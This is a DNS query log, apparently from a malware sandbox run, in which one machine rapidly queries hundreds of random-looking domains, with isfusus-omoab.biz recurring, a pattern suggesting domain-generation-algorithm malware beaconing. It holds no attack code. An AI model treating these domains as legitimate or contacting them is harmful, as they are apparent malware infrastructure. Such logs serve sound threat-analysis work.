                                                                                                                                                                    Sep 7, 2024 15:36:59.899960995 CEST192.168.2.121.1.1.10x968dStandard query (0)qksjyysquogob.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.993830919 CEST192.168.2.121.1.1.10x92caStandard query (0)qzmzqqokwibp.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.056436062 CEST192.168.2.121.1.1.10xeb72Standard query (0)yobikioonwei.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.183274031 CEST192.168.2.121.1.1.10xcd2fStandard query (0)gcswk.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.243721008 CEST192.168.2.121.1.1.10xe964Standard query (0)yxgicufjvaq.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.415781975 CEST192.168.2.121.1.1.10x2800Standard query (0)ogwcidlpmupcnx.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.681247950 CEST192.168.2.121.1.1.10xb3bStandard query (0)icimpqqcmgitzw.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.806215048 CEST192.168.2.121.1.1.10x184Standard query (0)knssugh.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.870105028 CEST192.168.2.121.1.1.10x9be7Standard query (0)aygqe.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.931442976 CEST192.168.2.121.1.1.10xb69eStandard query (0)kqaquama.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:00.993681908 CEST192.168.2.121.1.1.10x2cdaStandard query (0)sngakabudhw.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:01.243402958 CEST192.168.2.121.1.1.10x2cdaStandard query (0)sngakabudhw.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:01.306516886 CEST192.168.2.121.1.1.10x3bf1Standard query (0)ydyczugi.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:01.509387016 CEST192.168.2.121.1.1.10x84ccStandard query (0)fwxpi.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:01.556329966 CEST192.168.2.121.1.1.10xe5dbStandard query (0)ncvio.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:01.760921001 CEST192.168.2.121.1.1.10xd796Standard query (0)bauciywcxbmpuh.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:01.822807074 CEST192.168.2.121.1.1.10x70d6Standard query (0)tviycvhycsg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:02.071460962 CEST192.168.2.121.1.1.10x70d6Standard query (0)tviycvhycsg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:02.368850946 CEST192.168.2.121.1.1.10x5de7Standard query (0)gaoask.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:02.634386063 CEST192.168.2.121.1.1.10x5de7Standard query (0)gaoask.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:02.743729115 CEST192.168.2.121.1.1.10x33e9Standard query (0)wywseqghowg.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:02.791241884 CEST192.168.2.121.1.1.10xe2f3Standard query (0)skyoujqckw.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:02.837421894 CEST192.168.2.121.1.1.10xe624Standard query (0)ezmjagulq.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:02.902796030 CEST192.168.2.121.1.1.10xeb98Standard query (0)uypqiuvvakueq.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:02.954786062 CEST192.168.2.121.1.1.10x4caaStandard query (0)csvpqmsoq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:03.167072058 CEST192.168.2.121.1.1.10x581Standard query (0)hmbdiekioov.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:03.415565014 CEST192.168.2.121.1.1.10x581Standard query (0)hmbdiekioov.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:03.462685108 CEST192.168.2.121.1.1.10x9f44Standard query (0)byauyfm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:03.728287935 CEST192.168.2.121.1.1.10x9f44Standard query (0)byauyfm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.009599924 CEST192.168.2.121.1.1.10xa5eeStandard query (0)mfxoh.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.040599108 CEST192.168.2.121.1.1.10x965eStandard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.087584019 CEST192.168.2.121.1.1.10x138aStandard query (0)ffyqowyma.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.134357929 CEST192.168.2.121.1.1.10xff80Standard query (0)quggjasqaojen.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.181664944 CEST192.168.2.121.1.1.10xae7cStandard query (0)xjqkpqooxtw.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.259907007 CEST192.168.2.121.1.1.10x29c2Standard query (0)tktzotkocqawsu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.556344032 CEST192.168.2.121.1.1.10x6a52Standard query (0)cvcay.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.697459936 CEST192.168.2.121.1.1.10xaea7Standard query (0)umhqmtssxmd.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:04.980221987 CEST192.168.2.121.1.1.10x8431Standard query (0)jwypyoikdym.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.040910959 CEST192.168.2.121.1.1.10x20d7Standard query (0)ywuycoq.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.259773016 CEST192.168.2.121.1.1.10x648eStandard query (0)yeqsiakjrkzcgn.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.321983099 CEST192.168.2.121.1.1.10xb808Standard query (0)wumlys.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.393168926 CEST192.168.2.121.1.1.10xe11fStandard query (0)euyiaasuoagk.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.493845940 CEST192.168.2.121.1.1.10x739eStandard query (0)fqaywcbofui.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.618866920 CEST192.168.2.121.1.1.10x840dStandard query (0)knwsifene.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.837502956 CEST192.168.2.121.1.1.10x73edStandard query (0)yoqoyhnicqwkd.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.884380102 CEST192.168.2.121.1.1.10x1997Standard query (0)kggqldcgewyp.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:05.978379011 CEST192.168.2.121.1.1.10x7c7aStandard query (0)vckiskfacstum.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.025002956 CEST192.168.2.121.1.1.10x3dcfStandard query (0)kcosg.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.071873903 CEST192.168.2.121.1.1.10x8a62Standard query (0)waopcpg.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.372659922 CEST192.168.2.121.1.1.10x2786Standard query (0)cjycywuiswzby.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.588223934 CEST192.168.2.121.1.1.10x3722Standard query (0)xivwo.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.666305065 CEST192.168.2.121.1.1.10x2e8bStandard query (0)bioyheg.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.731077909 CEST192.168.2.121.1.1.10xd482Standard query (0)oslislxomuaa.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.790637970 CEST192.168.2.121.1.1.10x7882Standard query (0)efeps.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.857383966 CEST192.168.2.121.1.1.10xda0cStandard query (0)wctcz.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:06.931247950 CEST192.168.2.121.1.1.10x6f4fStandard query (0)sbkeikcxo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:07.150424957 CEST192.168.2.121.1.1.10xfbb2Standard query (0)dasesaeowig.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:07.196876049 CEST192.168.2.121.1.1.10xc7e1Standard query (0)usmwmx.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:07.462210894 CEST192.168.2.121.1.1.10xc7e1Standard query (0)usmwmx.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:08.165755987 CEST192.168.2.121.1.1.10x765fStandard query (0)jirrckkskcgfuk.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:08.212625980 CEST192.168.2.121.1.1.10x1e95Standard query (0)qedkulqw.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:08.260111094 CEST192.168.2.121.1.1.10x2b96Standard query (0)cmgofjisqs.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:08.525278091 CEST192.168.2.121.1.1.10x2b96Standard query (0)cmgofjisqs.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:09.809757948 CEST192.168.2.121.1.1.10x719Standard query (0)uwksaizy.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:09.837402105 CEST192.168.2.121.1.1.10x4f30Standard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:09.884326935 CEST192.168.2.121.1.1.10x452aStandard query (0)vylhiiymk.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:10.087533951 CEST192.168.2.121.1.1.10xb903Standard query (0)ryqouqcyzycgs.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:10.352996111 CEST192.168.2.121.1.1.10xb903Standard query (0)ryqouqcyzycgs.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:10.447669029 CEST192.168.2.121.1.1.10xf92dStandard query (0)ywleyak.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:10.509358883 CEST192.168.2.121.1.1.10x2e64Standard query (0)bnjkwdshi.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:10.774590015 CEST192.168.2.121.1.1.10x2e64Standard query (0)bnjkwdshi.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:10.886909008 CEST192.168.2.121.1.1.10x83f2Standard query (0)cmyudyygmdqsa.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.009421110 CEST192.168.2.121.1.1.10xe293Standard query (0)aickmovgb.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.056525946 CEST192.168.2.121.1.1.10xf268Standard query (0)xiyiwutkhkw.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.134510994 CEST192.168.2.121.1.1.10xcca5Standard query (0)pgjqwww.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.184410095 CEST192.168.2.121.1.1.10x6b10Standard query (0)oskqsayxkc.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.228287935 CEST192.168.2.121.1.1.10xbae8Standard query (0)uxbsssaoafezs.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.275042057 CEST192.168.2.121.1.1.10xe4c4Standard query (0)owgsee.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.478112936 CEST192.168.2.121.1.1.10xb3b1Standard query (0)xuamfqszeijec.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.588049889 CEST192.168.2.121.1.1.10xe132Standard query (0)mosuccr.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.729950905 CEST192.168.2.121.1.1.10xefa1Standard query (0)kkhuhavchmm.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.775151014 CEST192.168.2.121.1.1.10x27ddStandard query (0)eanag.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.916693926 CEST192.168.2.121.1.1.10x42f8Standard query (0)czveiecwqqca.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:11.978622913 CEST192.168.2.121.1.1.10x8039Standard query (0)lvwqymqqecl.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:12.228130102 CEST192.168.2.121.1.1.10x8039Standard query (0)lvwqymqqecl.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:12.822091103 CEST192.168.2.121.1.1.10xaeeaStandard query (0)wgccrdqkc.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:13.071739912 CEST192.168.2.121.1.1.10xaeeaStandard query (0)wgccrdqkc.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:13.369013071 CEST192.168.2.121.1.1.10xd6caStandard query (0)eoakrwioetk.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:13.488914967 CEST192.168.2.121.1.1.10xfd68Standard query (0)tcrcerorwca.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:13.743724108 CEST192.168.2.121.1.1.10xfd68Standard query (0)tcrcerorwca.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:13.853343010 CEST192.168.2.121.1.1.10xae9aStandard query (0)akspogjnsuyaq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:13.931818962 CEST192.168.2.121.1.1.10x7265Standard query (0)ohuaerw.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.105253935 CEST192.168.2.121.1.1.10x2972Standard query (0)ckggt.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.246469975 CEST192.168.2.121.1.1.10x897fStandard query (0)dwcdujqcaykeot.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.306297064 CEST192.168.2.121.1.1.10xc93Standard query (0)mxkyh.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.368745089 CEST192.168.2.121.1.1.10xfe90Standard query (0)svttsao.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.462640047 CEST192.168.2.121.1.1.10x3a90Standard query (0)schiysvxsye.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.556370020 CEST192.168.2.121.1.1.10x4eb0Standard query (0)uwsng.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.823380947 CEST192.168.2.121.1.1.10x27adStandard query (0)isaatieqykghz.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.853065014 CEST192.168.2.121.1.1.10xfc5cStandard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:14.884361029 CEST192.168.2.121.1.1.10x9fc5Standard query (0)cisjuclewqxqmp.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:15.133955956 CEST192.168.2.121.1.1.10x9fc5Standard query (0)cisjuclewqxqmp.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:15.196871042 CEST192.168.2.121.1.1.10xc3dcStandard query (0)rsyicmeqwif.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:15.416928053 CEST192.168.2.121.1.1.10x6636Standard query (0)naiom.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:15.462446928 CEST192.168.2.121.1.1.10x309Standard query (0)wnqvkcukedu.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:15.727694035 CEST192.168.2.121.1.1.10x309Standard query (0)wnqvkcukedu.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:16.346137047 CEST192.168.2.121.1.1.10xbda1Standard query (0)wbzfcqmsaqo.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:16.540668964 CEST192.168.2.121.1.1.10x37d8Standard query (0)mgoywzkusfqhiq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:16.603156090 CEST192.168.2.121.1.1.10xb2a2Standard query (0)whkww.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:16.665637016 CEST192.168.2.121.1.1.10x4d3cStandard query (0)ipqkcgxwvrceb.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:16.743959904 CEST192.168.2.121.1.1.10xf354Standard query (0)ewavwts.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:16.947451115 CEST192.168.2.121.1.1.10xf4a6Standard query (0)smmlymj.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:16.993774891 CEST192.168.2.121.1.1.10xac31Standard query (0)yteabgkcl.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:17.197515011 CEST192.168.2.121.1.1.10x88b6Standard query (0)mmgipdiwahwo.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:17.275645971 CEST192.168.2.121.1.1.10x90c1Standard query (0)uuhhwy.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:17.341031075 CEST192.168.2.121.1.1.10xf9e3Standard query (0)qgkmawwceq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:17.384494066 CEST192.168.2.121.1.1.10x2877Standard query (0)kprwmigc.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:17.557090998 CEST192.168.2.121.1.1.10xf8b7Standard query (0)rlawguymt.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:17.759582043 CEST192.168.2.121.1.1.10x2f95Standard query (0)coyiogm.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:18.009737015 CEST192.168.2.121.1.1.10x2f95Standard query (0)coyiogm.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:18.089355946 CEST192.168.2.121.1.1.10x272eStandard query (0)fkawicvqfhmdms.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:18.337280989 CEST192.168.2.121.1.1.10x272eStandard query (0)fkawicvqfhmdms.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:18.416306019 CEST192.168.2.121.1.1.10xee34Standard query (0)mrpbwiwiobyk.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:18.462641954 CEST192.168.2.121.1.1.10xa346Standard query (0)mgwwciheymq.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:18.712544918 CEST192.168.2.121.1.1.10xa346Standard query (0)mgwwciheymq.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:18.806864023 CEST192.168.2.121.1.1.10x4012Standard query (0)imykgyswcue.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:19.009794950 CEST192.168.2.121.1.1.10x259Standard query (0)orewqyqa.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:19.150342941 CEST192.168.2.121.1.1.10x1c57Standard query (0)nuzwq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:19.353133917 CEST192.168.2.121.1.1.10xe83fStandard query (0)jtoilo.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:19.540642977 CEST192.168.2.121.1.1.10x9472Standard query (0)wubdd.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:19.750860929 CEST192.168.2.121.1.1.10x496eStandard query (0)cqmuggk.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:19.812551022 CEST192.168.2.121.1.1.10x2f20Standard query (0)hsxszs.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:19.844047070 CEST192.168.2.121.1.1.10x63c9Standard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:19.884398937 CEST192.168.2.121.1.1.10x59c6Standard query (0)uqnpx.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:20.088496923 CEST192.168.2.121.1.1.10x968fStandard query (0)cmkubmjabd.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:20.338969946 CEST192.168.2.121.1.1.10x1f7aStandard query (0)yifyieeymzv.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:20.419686079 CEST192.168.2.121.1.1.10xc270Standard query (0)zmuwp.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:20.557590008 CEST192.168.2.121.1.1.10x1264Standard query (0)tiajm.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:20.603203058 CEST192.168.2.121.1.1.10x97bdStandard query (0)ukeyotqgqikni.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:20.696926117 CEST192.168.2.121.1.1.10x99bdStandard query (0)iosfsfimh.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:20.838351011 CEST192.168.2.121.1.1.10xe563Standard query (0)fgoukibsohr.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:21.120228052 CEST192.168.2.121.1.1.10xd8c5Standard query (0)imocob.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:21.166321039 CEST192.168.2.121.1.1.10x170dStandard query (0)svaxaqaocnkkm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:21.368742943 CEST192.168.2.121.1.1.10x1d28Standard query (0)gcomcyxaqkcqla.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:21.400176048 CEST192.168.2.121.1.1.10x4765Standard query (0)oltauamwcsz.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:21.668204069 CEST192.168.2.121.1.1.10x4765Standard query (0)oltauamwcsz.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:21.696887970 CEST192.168.2.121.1.1.10xa20dStandard query (0)uuuamcagdeo.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:21.759407043 CEST192.168.2.121.1.1.10xe471Standard query (0)ukfcbmu.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:21.855921030 CEST192.168.2.121.1.1.10xa2aStandard query (0)xknzuzj.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.056832075 CEST192.168.2.121.1.1.10xed89Standard query (0)aomokamddlhon.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.103123903 CEST192.168.2.121.1.1.10x380fStandard query (0)pudkcpvmxivbo.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.200191975 CEST192.168.2.121.1.1.10x90bcStandard query (0)moayueuir.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.259998083 CEST192.168.2.121.1.1.10xdd1Standard query (0)orcekehmam.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.306777000 CEST192.168.2.121.1.1.10x8345Standard query (0)umqixezeo.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.526626110 CEST192.168.2.121.1.1.10xbeccStandard query (0)ageum.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.573149920 CEST192.168.2.121.1.1.10xbd48Standard query (0)ecekgtimcnqt.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.697612047 CEST192.168.2.121.1.1.10x4ca3Standard query (0)dfsxuhgevawu.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.900168896 CEST192.168.2.121.1.1.10xf2daStandard query (0)dwabaao.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.946891069 CEST192.168.2.121.1.1.10x2fddStandard query (0)gegyzwqkkigai.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:22.993973970 CEST192.168.2.121.1.1.10xd0c9Standard query (0)uukmtoyse.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:23.275032997 CEST192.168.2.121.1.1.10xeea3Standard query (0)uiyiue.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:23.323215961 CEST192.168.2.121.1.1.10xc1d2Standard query (0)iinicameisw.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:23.370801926 CEST192.168.2.121.1.1.10x5c6eStandard query (0)qccqenfzycgh.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:23.431412935 CEST192.168.2.121.1.1.10x7a7Standard query (0)esqyf.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:23.696976900 CEST192.168.2.121.1.1.10x324fStandard query (0)yklmosaqsbfo.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:23.759499073 CEST192.168.2.121.1.1.10x27c9Standard query (0)aoqwf.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:23.822000980 CEST192.168.2.121.1.1.10xd1baStandard query (0)fciikauyyosis.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:23.868752956 CEST192.168.2.121.1.1.10xd7e6Standard query (0)sirceuhqo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:24.134618998 CEST192.168.2.121.1.1.10xd7e6Standard query (0)sirceuhqo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:24.525470972 CEST192.168.2.121.1.1.10xb454Standard query (0)vxxklygmoyyj.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:24.588082075 CEST192.168.2.121.1.1.10x49e4Standard query (0)gmgksfxavydsn.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:24.822619915 CEST192.168.2.121.1.1.10x55eStandard query (0)iifbdqqmleekc.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:24.868814945 CEST192.168.2.121.1.1.10x67c0Standard query (0)uojcoxwyzwky.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:25.042251110 CEST192.168.2.121.1.1.10x5a1Standard query (0)gpwokmys.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:25.290199041 CEST192.168.2.121.1.1.10x5a1Standard query (0)gpwokmys.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:25.353244066 CEST192.168.2.121.1.1.10x9dddStandard query (0)tupnmqnme.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:25.648608923 CEST192.168.2.121.1.1.10xb8cdStandard query (0)rwidookywwwa.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:37:25.701802015 CEST192.168.2.121.1.1.10xd360Standard query (0)ikowiy.phA (IP address)IN (0x0001)false
